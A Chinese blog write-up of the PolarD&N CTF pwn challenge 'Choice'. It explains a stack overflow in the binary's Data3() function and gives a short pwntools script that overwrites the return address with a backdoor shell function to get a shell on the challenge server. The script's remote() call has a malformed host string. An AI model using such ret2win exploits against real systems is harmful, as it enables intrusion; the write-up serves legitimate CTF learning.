PolarD&N CTF—Choice

已于 2023-10-12 21:17:12 修改
阅读量200 收藏
点赞数
文章标签: 安全 web安全
于 2023-10-12 21:16:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64447841/article/details/133797442
版权

题目地址:https://www.polarctf.com

这是一道比较常规的PWN题

先来查看一下题目开启了什么保护:

只开启了NX保护

再把文件放入64位IDA分析:

main()函数中,可以看出程序给出三个选项分别对应Data1()Data2()Data3()三个函数

接下来我们挨个查看这三个函数查找漏洞点:

先看Data1()

函数虽然存在溢出 ,但溢出距离不足以构造payload攻击链,不能getshell。

再查看Data2()函数与Data1()情况相同:

再看Data3()

Data3()函数中有一个read()函数,可以读取0x50个字节数据到buf,而buf的大小只有0x30,这里存在明显栈溢出。

Shift+F12查看字符串发现有后门函数shell

接下来解题思路就很简单了:计算溢出偏移量,运行程序输入3进入Data3()函数,根据偏移量输入占位字符,并覆盖返回地址为Shell()函数地址,然后getshell。

exp:

from pwn import *
r = remote('nc 123.60.135.228',2054)
elf = ELF("./Choice")
Shell_Addr = 0x004007bd
payload = '3'
r.sendline(payload)
payload1 = (0x30 + 8) * b'a' + p64(Shell_Addr)
r.sendline(payload1)
r.interactive()

不愿透露姓名的少女
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2375
所以bp的方法就不行了。然后源码看了好久都没到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1469
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
PolarD&N-CTF-web方向-困难
J1ng_Hong的博客
12-13 1515
或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是../flag.php就可以了。
PolarD&N_CTF_WEB_被黑掉的站
weixin_62626298的博客
10-12 203
1.首先进网站看一下i提示说现在站中还有很多马我们用kali中dirsearch来扫描一下本站目录可以看出现在站中有一个bak备份文件和一个shell.php的木马先访问一下shell.php是一个登录网页随便输入密码,打开bp抓包看一下传递了一个参数pass再打开备份文件看一下好像是一个密码字典,使用bp爆破一下试试攻击后得到flag。
PolarD&N靶场题解
qq_43423311的博客
03-23 2488
PolarD&N CTF靶场。
PolarD&N CTF—小心有F射
m0_64447841的博客
10-12 145
仿射解密函数:F(x) = a-1(x - b) (mod m),其中a-1是a在Zm群的乘法逆元,m是字母的数量。3、即将纯文本字母的整数值乘以a,然后将b加到结果中,最后我们取模数m(也就是说,当解除以m时取余数,或者取掉字母的长度,直到得到小于该长度的数字)。拿到这个文本的第一时间是没有思路的,因为确实是我没见过的密码,但是仔细观察第一行字符串很像公式,就搜索了一下,然后就搜索到了这个密码。2)到的明文字母的整数值后,对这些值执行计算,在此例中,所需的计算为(5x + 8);
polarD&N2023秋季个人挑战赛MISC
m0_61025358的博客
12-08 1399
CTF竞赛是安全圈喜闻乐见的竞赛模式,对于培养网络安全技术人才起到了很重要的作用。CTF起源于1996年DEFCON全球黑客大会,是Capture The Flag的简称。经过多年的发展,CTF这种比赛形式已经日益成熟。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。
PolarD&N】刷题记录
青青很OK的博客
03-26 787
空格绕过:<,<>,${IFS},$IFS,%20(space),%09(tab),$IFS$9,$IFS$1。所以需要先输入a=flag,这样就有了$a=$flag,再输入flag=a,把flag值拿回来。3.保存修改后的id,再去点击id修改为9的那款奶茶,获得flag。2.根据代码尝试绕过,查看根目录下的内容,发现了flag。明面上给的flag是一个虚假的flag,提交发现是错误的。看到了一个didi,联想到给的提示,改成yes后放包。前一个输入三个.一个/过滤后剩一个.与后面的./拼接。
PolarD&N(swp)
果粒程
04-15 614
根据提示去swp文件,首先了解什么是swp文件swp即swap(交换分区)的简写,在编辑文件时产生,它是隐藏文件。这个文件是一个临时交换文件,用来备份缓冲区中的内容。类似于Windows的虚拟内存,就是当内存不足的时候,把一部分硬盘空间虚拟成内存使用,从而解决内存容量不足的情况。如果文件正常退出,则此文件自动删除。如果并没有对文件进行修改,而只是读取文件,是不会产生swp文件的.swp的产生1.当你用多个程序编辑同一个文件时。
等保测评和安全运维
weixin_64392888的博客
06-11 671
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1412
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 429
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 967
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1151
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
安全漏洞扫描工具
weixin_45639224的博客
06-05 710
安全漏洞扫描工具
NTFS安全权限
2302_80097039的博客
06-12 637
NTFS权限是基于。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 538
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
Linux网络安全
十一、的博客
06-09 891
由于Linux系统的安全稳定,所以经常被用作网络应用服务器。但由于程序代码缺陷的难以避免,这些安装在Linux系统上的网络程序往往会存在着各种漏洞,而入侵者则是利用这些漏洞进行网络攻击,进入系统窃取数据、破坏系统或使系统无法提供正常服务等。Ping是基于ICMP协议的一个实用程序,用于验证两台计算机之间网络连接的可达性和质量。它通过发送ICMP回声请求消息到目标主机,并等待回声应答消息来判断网络状态。当执行ping命令时,它会生成一个ICMP回声请求数据包并发送到指定的目标主机。
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 1114
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值